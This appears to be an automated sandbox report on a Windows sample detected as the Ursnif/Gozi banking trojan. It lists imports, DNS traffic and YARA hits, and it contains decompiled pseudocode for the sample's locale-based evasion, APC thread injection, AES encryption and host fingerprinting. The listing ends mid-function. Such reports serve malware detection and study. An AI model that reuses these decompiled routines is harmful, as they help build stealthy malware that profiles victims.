            RT_GROUP_ICON0x27581800x22dataSami LappishSweden
            RT_GROUP_ICON0x27628900x76dataSami LappishFinland
            RT_GROUP_ICON0x27628900x76dataSami LappishNorway
            RT_GROUP_ICON0x27628900x76dataSami LappishSweden
            RT_GROUP_ICON0x27688200x68dataSami LappishFinland
            RT_GROUP_ICON0x27688200x68dataSami LappishNorway
            RT_GROUP_ICON0x27688200x68dataSami LappishSweden
            RT_VERSION0x2769d180x2d4data
            None0x2769cd80xadataSami LappishFinland
            None0x2769cd80xadataSami LappishNorway
            None0x2769cd80xadataSami LappishSweden
            None0x2769ce80xadataSami LappishFinland
            None0x2769ce80xadataSami LappishNorway
            None0x2769ce80xadataSami LappishSweden
            None0x2769cf80xadataSami LappishFinland
            None0x2769cf80xadataSami LappishNorway
            None0x2769cf80xadataSami LappishSweden
            None0x2769d080xadataSami LappishFinland
            None0x2769d080xadataSami LappishNorway
            None0x2769d080xadataSami LappishSweden
            DLLImport
            KERNEL32.dllSetDefaultCommConfigA, CreateMutexW, GetStringTypeA, GlobalCompact, _llseek, BuildCommDCBAndTimeoutsA, EnumCalendarInfoW, VerSetConditionMask, GetConsoleAliasA, GetCurrentActCtx, WriteConsoleInputA, SetEvent, GetModuleHandleW, EnumTimeFormatsW, InitializeCriticalSection, LoadLibraryW, GetFileAttributesA, TransactNamedPipe, WritePrivateProfileSectionW, TerminateProcess, IsDBCSLeadByte, lstrcmpW, GlobalUnlock, SetCurrentDirectoryA, GetCPInfoExW, SetLastError, GetProcAddress, PeekConsoleInputW, GetFirmwareEnvironmentVariableW, SearchPathA, OpenWaitableTimerA, GetProcessId, LocalAlloc, SetCalendarInfoW, FindFirstVolumeMountPointW, GlobalGetAtomNameW, AddAtomA, WaitForMultipleObjects, EnumResourceTypesW, GetPrivateProfileSectionNamesA, FindNextFileA, FreeEnvironmentStringsW, GetWindowsDirectoryW, DeleteFileW, EnumCalendarInfoExA, CopyFileExA, SetStdHandle, WriteConsoleW, GetLastError, MoveFileA, WideCharToMultiByte, HeapAlloc, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, DecodePointer, TlsFree, GetCurrentThreadId, GetCurrentThread, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCurrentProcess, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, HeapCreate, HeapDestroy, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameA, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, MultiByteToWideChar, GetStringTypeW, FatalAppExitA, HeapFree, Sleep, IsProcessorFeaturePresent, GetLocaleInfoW, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, RtlUnwind, HeapReAlloc, HeapSize, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, CreateFileW
            USER32.dllLoadMenuW
            Language of compilation systemCountry where language is spokenMap
            Sami LappishFinland
            Sami LappishNorway
            Sami LappishSweden

            Download Network PCAP: filteredfull

            TimestampSource PortDest PortSource IPDest IP
            Mar 24, 2023 14:02:14.183909893 CET5859553192.168.2.68.8.8.8
            Mar 24, 2023 14:02:14.220094919 CET53585958.8.8.8192.168.2.6
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Mar 24, 2023 14:02:14.183909893 CET192.168.2.68.8.8.80x81e3Standard query (0)checklist.skype.comA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Mar 24, 2023 14:02:14.220094919 CET8.8.8.8192.168.2.60x81e3Name error (3)checklist.skype.comnonenoneA (IP address)IN (0x0001)false
            050100s020406080100

            Click to jump to process

            050100s0.002040MB

            Click to jump to process

            Target ID:0
            Start time:14:01:20
            Start date:24/03/2023
            Path:C:\Users\user\Desktop\server.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\Desktop\server.exe
            Imagebase:0x400000
            File size:251904 bytes
            MD5 hash:62C6ED30422B5876110EE6AB6660223E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.524385059.0000000002BA6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.524298163.0000000002B80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            Reputation:low
            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

            Executed Functions

            Control-flow Graph

            C-Code - Quality: 85%
            			E004019F1() {
            				long _v8;
            				char _v12;
            				char _v16;
            				void* _v40;
            				long _t28;
            				long _t30;
            				long _t31;
            				signed short _t33;
            				void* _t37;
            				long _t40;
            				long _t41;
            				void* _t48;
            				intOrPtr _t50;
            				signed int _t57;
            				signed int _t58;
            				long _t63;
            				long _t65;
            				intOrPtr _t66;
            				void* _t71;
            				void* _t75;
            				signed int _t77;
            				signed int _t78;
            				void* _t82;
            				intOrPtr* _t83;
            
            				_t28 = E00401D68();
            				_v8 = _t28;
            				if(_t28 != 0) {
            					return _t28;
            				}
            				do {
            					_t77 = 0;
            					_v12 = 0;
            					_t63 = 0x30;
            					do {
            						_t71 = E004012E6(_t63);
            						if(_t71 == 0) {
            							_v8 = 8;
            						} else {
            							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
            							_t67 = _t57;
            							_t58 = _t57 & 0x0000ffff;
            							_v8 = _t58;
            							if(_t58 == 4) {
            								_t63 = _t63 + 0x30;
            							}
            							_t78 = 0x13;
            							_t10 = _t67 + 1; // 0x1
            							_t77 =  *_t71 % _t78 + _t10;
            							E00401BA9(_t71);
            						}
            					} while (_v8 != 0);
            					_t30 = E00401688(_t77); // executed
            					_v8 = _t30;
            					Sleep(_t77 << 4); // executed
            					_t31 = _v8;
            				} while (_t31 == 0x15);
            				if(_t31 != 0) {
            					L30:
            					return _t31;
            				}
            				_v12 = 0;
            				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
            				if(_t33 == 0) {
            					__imp__GetSystemDefaultUILanguage();
            					_t67 =  &_v12;
            					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
            				}
            				if(_v12 == 0x5552) {
            					L28:
            					_t31 = _v8;
            					if(_t31 == 0xffffffff) {
            						_t31 = GetLastError();
            					}
            					goto L30;
            				} else {
            					if(E00401800(_t67,  &_v16) != 0) {
            						 *0x404178 = 0;
            						L20:
            						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
            						_t82 = _t37;
            						if(_t82 == 0) {
            							L27:
            							_v8 = GetLastError();
            							goto L28;
            						}
            						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
            						if(_t40 == 0) {
            							_t65 = GetLastError();
            							TerminateThread(_t82, _t65);
            							CloseHandle(_t82);
            							_t82 = 0;
            							SetLastError(_t65);
            						}
            						if(_t82 == 0) {
            							goto L27;
            						} else {
            							_t41 = WaitForSingleObject(_t82, 0xffffffff);
            							_v8 = _t41;
            							if(_t41 == 0) {
            								GetExitCodeThread(_t82,  &_v8);
            							}
            							CloseHandle(_t82);
            							goto L28;
            						}
            					}
            					_t66 = _v16;
            					_t83 = __imp__GetLongPathNameW;
            					_t48 =  *_t83(_t66, 0, 0); // executed
            					_t75 = _t48;
            					if(_t75 == 0) {
            						L18:
            						 *0x404178 = _t66;
            						goto L20;
            					}
            					_t22 = _t75 + 2; // 0x2
            					_t50 = E004012E6(_t75 + _t22);
            					 *0x404178 = _t50;
            					if(_t50 == 0) {
            						goto L18;
            					}
            					 *_t83(_t66, _t50, _t75); // executed
            					E00401BA9(_t66);
            					goto L20;
            				}
            			}



























            0x004019f7
            0x004019fc
            0x00401a01
            0x00401ba8
            0x00401ba8
            0x00401a0a
            0x00401a0a
            0x00401a0e
            0x00401a11
            0x00401a12
            0x00401a18
            0x00401a1c
            0x00401a53
            0x00401a1e
            0x00401a26
            0x00401a2c
            0x00401a2e
            0x00401a33
            0x00401a39
            0x00401a3b
            0x00401a3b
            0x00401a42
            0x00401a48
            0x00401a48
            0x00401a4c
            0x00401a4c
            0x00401a5a
            0x00401a61
            0x00401a6a
            0x00401a6d
            0x00401a73
            0x00401a76
            0x00401a7f
            0x00401ba4
            0x00000000
            0x00401ba6
            0x00401a92
            0x00401a95
            0x00401a9d
            0x00401a9f
            0x00401aaa
            0x00401ab2
            0x00401ab2
            0x00401ac0
            0x00401b96
            0x00401b96
            0x00401b9c
            0x00401b9e
            0x00401b9e
            0x00000000
            0x00401ac6
            0x00401ad1
            0x00401b0f
            0x00401b15
            0x00401b27
            0x00401b2d
            0x00401b31
            0x00401b8d
            0x00401b93
            0x00000000
            0x00401b93
            0x00401b3d
            0x00401b4b
            0x00401b53
            0x00401b57
            0x00401b5e
            0x00401b61
            0x00401b63
            0x00401b63
            0x00401b6b
            0x00000000
            0x00401b6d
            0x00401b70
            0x00401b76
            0x00401b7b
            0x00401b82
            0x00401b82
            0x00401b89
            0x00000000
            0x00401b89
            0x00401b6b
            0x00401ad3
            0x00401ad8
            0x00401adf
            0x00401ae1
            0x00401ae5
            0x00401b07
            0x00401b07
            0x00000000
            0x00401b07
            0x00401ae7
            0x00401aec
            0x00401af1
            0x00401af8
            0x00000000
            0x00000000
            0x00401afd
            0x00401b00
            0x00000000
            0x00401b00

            APIs
              • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
              • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
              • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
              • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
              • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            • NtQuerySystemInformation.NTDLL ref: 00401A26
            • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
            • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
            • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
            • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B27
            • QueueUserAPC.KERNELBASE(0040139F,00000000,?,?,00000000), ref: 00401B3D
            • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
            • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
            • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
            • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
            • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
            • String ID:
            • API String ID: 3475612337-0
            • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
            • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
            • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
            • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 113 47e1508-47e1548 CryptAcquireContextW 114 47e154e-47e158a memcpy CryptImportKey 113->114 115 47e169f-47e16a5 113->115 116 47e168a-47e1690 114->116 117 47e1590-47e15a2 CryptSetKeyParam 114->117 123 47e16a8-47e16af 115->123 125 47e1693-47e169d CryptReleaseContext 116->125 118 47e15a8-47e15b1 117->118 119 47e1676-47e167c 117->119 121 47e15b9-47e15c6 call 47e33dc 118->121 122 47e15b3-47e15b5 118->122 130 47e167f-47e1688 CryptDestroyKey 119->130 131 47e15cc-47e15d5 121->131 132 47e166d-47e1674 121->132 122->121 126 47e15b7 122->126 125->123 126->121 130->125 133 47e15d8-47e15e0 131->133 132->130 134 47e15e5-47e1602 memcpy 133->134 135 47e15e2 133->135 136 47e161d-47e1629 134->136 137 47e1604-47e161b CryptEncrypt 134->137 135->134 138 47e1632-47e1634 136->138 137->138 139 47e1636-47e1640 138->139 140 47e1644-47e164f 138->140 139->133 141 47e1642 139->141 142 47e1651-47e1661 140->142 144 47e1663-47e166b call 47e61da 140->144 141->142 142->130 144->130
            C-Code - Quality: 50%
            			E047E1508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
            				int _v8;
            				long* _v12;
            				int _v16;
            				void* _v20;
            				long* _v24;
            				void* _v39;
            				char _v40;
            				void _v56;
            				int _v60;
            				intOrPtr _v64;
            				void _v67;
            				char _v68;
            				void* _t61;
            				int _t68;
            				signed int _t76;
            				int _t79;
            				int _t81;
            				void* _t85;
            				long _t86;
            				int _t90;
            				signed int _t94;
            				int _t101;
            				void* _t102;
            				int _t103;
            				void* _t104;
            				void* _t105;
            				void* _t106;
            
            				_t103 = __eax;
            				_t94 = 6;
            				_v68 = 0;
            				memset( &_v67, 0, _t94 << 2);
            				_t105 = _t104 + 0xc;
            				asm("stosw");
            				asm("stosb");
            				_v40 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosw");
            				asm("stosb");
            				_t61 =  *0x47ea0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
            				if(_t61 == 0) {
            					_a8 = GetLastError();
            				} else {
            					_t101 = 0x10;
            					memcpy( &_v56, _a8, _t101);
            					_t106 = _t105 + 0xc;
            					_v60 = _t101;
            					_v67 = 2;
            					_v64 = 0x660e;
            					_v68 = 8;
            					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
            					if(_t68 == 0) {
            						_a8 = GetLastError();
            					} else {
            						_push(0);
            						_push( &_v40);
            						_push(1);
            						_push(_v12);
            						if( *0x47ea0e4() == 0) {
            							_a8 = GetLastError();
            						} else {
            							_t18 = _t103 + 0xf; // 0x10
            							_t76 = _t18 & 0xfffffff0;
            							if(_a4 != 0 && _t76 == _t103) {
            								_t76 = _t76 + _t101;
            							}
            							_t102 = E047E33DC(_t76);
            							_v20 = _t102;
            							if(_t102 == 0) {
            								_a8 = 8;
            							} else {
            								_v16 = 0;
            								_a8 = 0;
            								while(1) {
            									_t79 = 0x10;
            									_v8 = _t79;
            									if(_t103 <= _t79) {
            										_v8 = _t103;
            									}
            									memcpy(_t102, _a12, _v8);
            									_t81 = _v8;
            									_a12 = _a12 + _t81;
            									_t103 = _t103 - _t81;
            									_t106 = _t106 + 0xc;
            									if(_a4 == 0) {
            										_t85 =  *0x47ea0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
            									} else {
            										_t85 =  *0x47ea0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
            									}
            									if(_t85 == 0) {
            										break;
            									}
            									_t90 = _v8;
            									_v16 = _v16 + _t90;
            									_t102 = _t102 + _t90;
            									if(_t103 != 0) {
            										continue;
            									} else {
            										L17:
            										 *_a16 = _v20;
            										 *_a20 = _v16;
            									}
            									goto L21;
            								}
            								_t86 = GetLastError();
            								_a8 = _t86;
            								if(_t86 != 0) {
            									E047E61DA(_v20);
            								} else {
            									goto L17;
            								}
            							}
            						}
            						L21:
            						CryptDestroyKey(_v12);
            					}
            					CryptReleaseContext(_v24, 0);
            				}
            				return _a8;
            			}






























            0x047e1511
            0x047e1517
            0x047e151a
            0x047e1520
            0x047e1520
            0x047e1522
            0x047e1524
            0x047e1527
            0x047e152d
            0x047e152e
            0x047e152f
            0x047e1535
            0x047e153a
            0x047e1540
            0x047e1548
            0x047e16a5
            0x047e154e
            0x047e1550
            0x047e1559
            0x047e155e
            0x047e1570
            0x047e1573
            0x047e1577
            0x047e157e
            0x047e1582
            0x047e158a
            0x047e1690
            0x047e1590
            0x047e1590
            0x047e1594
            0x047e1595
            0x047e1597
            0x047e15a2
            0x047e167c
            0x047e15a8
            0x047e15a8
            0x047e15ab
            0x047e15b1
            0x047e15b7
            0x047e15b7
            0x047e15bf
            0x047e15c1
            0x047e15c6
            0x047e166d
            0x047e15cc
            0x047e15d2
            0x047e15d5
            0x047e15d8
            0x047e15da
            0x047e15db
            0x047e15e0
            0x047e15e2
            0x047e15e2
            0x047e15ec
            0x047e15f1
            0x047e15f4
            0x047e15f7
            0x047e15f9
            0x047e1602
            0x047e162c
            0x047e1604
            0x047e1615
            0x047e1615
            0x047e1634
            0x00000000
            0x00000000
            0x047e1636
            0x047e1639
            0x047e163c
            0x047e1640
            0x00000000
            0x047e1642
            0x047e1651
            0x047e1657
            0x047e165f
            0x047e165f
            0x00000000
            0x047e1640
            0x047e1644
            0x047e164a
            0x047e164f
            0x047e1666
            0x00000000
            0x00000000
            0x00000000
            0x047e164f
            0x047e15c6
            0x047e167f
            0x047e1682
            0x047e1682
            0x047e1697
            0x047e1697
            0x047e16af

            APIs
            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,047E5088,00000001,047E3ECE,00000000), ref: 047E1540
            • memcpy.NTDLL(047E5088,047E3ECE,00000010,?,?,?,047E5088,00000001,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740), ref: 047E1559
            • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 047E1582
            • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 047E159A
            • memcpy.NTDLL(00000000,76B5C740,05429600,00000010), ref: 047E15EC
            • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05429600,00000020,?,?,00000010), ref: 047E1615
            • GetLastError.KERNEL32(?,?,00000010), ref: 047E1644
            • GetLastError.KERNEL32 ref: 047E1676
            • CryptDestroyKey.ADVAPI32(00000000), ref: 047E1682
            • GetLastError.KERNEL32 ref: 047E168A
            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 047E1697
            • GetLastError.KERNEL32(?,?,?,047E5088,00000001,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E169F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
            • String ID: @MetNet
            • API String ID: 3401600162-2109406137
            • Opcode ID: 32f542c332a94904128dc0d34b9b5e65bae7b954120b4b2e6fb0230d9559bb2a
            • Instruction ID: 681ddcf83e2e79da15e6500c3bc36cc23806c9203a028502e1637b5b7756a819
            • Opcode Fuzzy Hash: 32f542c332a94904128dc0d34b9b5e65bae7b954120b4b2e6fb0230d9559bb2a
            • Instruction Fuzzy Hash: AC516BB1900209FFDB10DFA6CC89AEE7BB9FB08340F448629F915E6240E7749E14DB60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 238 47e3bd3-47e3be7 239 47e3be9-47e3bee 238->239 240 47e3bf1-47e3c03 call 47e71cd 238->240 239->240 243 47e3c57-47e3c64 240->243 244 47e3c05-47e3c15 GetUserNameW 240->244 245 47e3c66-47e3c7d GetComputerNameW 243->245 244->245 246 47e3c17-47e3c27 RtlAllocateHeap 244->246 248 47e3c7f-47e3c90 RtlAllocateHeap 245->248 249 47e3cbb-47e3cdf 245->249 246->245 247 47e3c29-47e3c36 GetUserNameW 246->247 251 47e3c38-47e3c44 call 47e56b9 247->251 252 47e3c46-47e3c55 247->252 248->249 250 47e3c92-47e3c9b GetComputerNameW 248->250 253 47e3cac-47e3caf 250->253 254 47e3c9d-47e3ca9 call 47e56b9 250->254 251->252 252->245 253->249 254->253
            C-Code - Quality: 96%
            			E047E3BD3(char __eax, void* __esi) {
            				long _v8;
            				char _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v28;
            				long _t34;
            				signed int _t39;
            				long _t50;
            				char _t59;
            				intOrPtr _t61;
            				void* _t62;
            				void* _t64;
            				char _t65;
            				intOrPtr* _t67;
            				void* _t68;
            				void* _t69;
            
            				_t69 = __esi;
            				_t65 = __eax;
            				_v8 = 0;
            				_v12 = __eax;
            				if(__eax == 0) {
            					_t59 =  *0x47ea310; // 0xd448b889
            					_v12 = _t59;
            				}
            				_t64 = _t69;
            				E047E71CD( &_v12, _t64);
            				if(_t65 != 0) {
            					 *_t69 =  *_t69 ^  *0x47ea344 ^ 0x6c7261ae;
            				} else {
            					GetUserNameW(0,  &_v8); // executed
            					_t50 = _v8;
            					if(_t50 != 0) {
            						_t62 = RtlAllocateHeap( *0x47ea2d8, 0, _t50 + _t50);
            						if(_t62 != 0) {
            							if(GetUserNameW(_t62,  &_v8) != 0) {
            								_t64 = _t62;
            								 *_t69 =  *_t69 ^ E047E56B9(_v8 + _v8, _t64);
            							}
            							HeapFree( *0x47ea2d8, 0, _t62);
            						}
            					}
            				}
            				_t61 = __imp__;
            				_v8 = _v8 & 0x00000000;
            				GetComputerNameW(0,  &_v8);
            				_t34 = _v8;
            				if(_t34 != 0) {
            					_t68 = RtlAllocateHeap( *0x47ea2d8, 0, _t34 + _t34);
            					if(_t68 != 0) {
            						if(GetComputerNameW(_t68,  &_v8) != 0) {
            							_t64 = _t68;
            							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E047E56B9(_v8 + _v8, _t64);
            						}
            						HeapFree( *0x47ea2d8, 0, _t68);
            					}
            				}
            				asm("cpuid");
            				_t67 =  &_v28;
            				 *_t67 = 1;
            				 *((intOrPtr*)(_t67 + 4)) = _t61;
            				 *((intOrPtr*)(_t67 + 8)) = 0;
            				 *(_t67 + 0xc) = _t64;
            				_t39 = _v16 ^ _v20 ^ _v28;
            				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
            				return _t39;
            			}



















            0x047e3bd3
            0x047e3bdb
            0x047e3bdf
            0x047e3be2
            0x047e3be7
            0x047e3be9
            0x047e3bee
            0x047e3bee
            0x047e3bf4
            0x047e3bf6
            0x047e3c03
            0x047e3c64
            0x047e3c05
            0x047e3c0a
            0x047e3c10
            0x047e3c15
            0x047e3c23
            0x047e3c27
            0x047e3c36
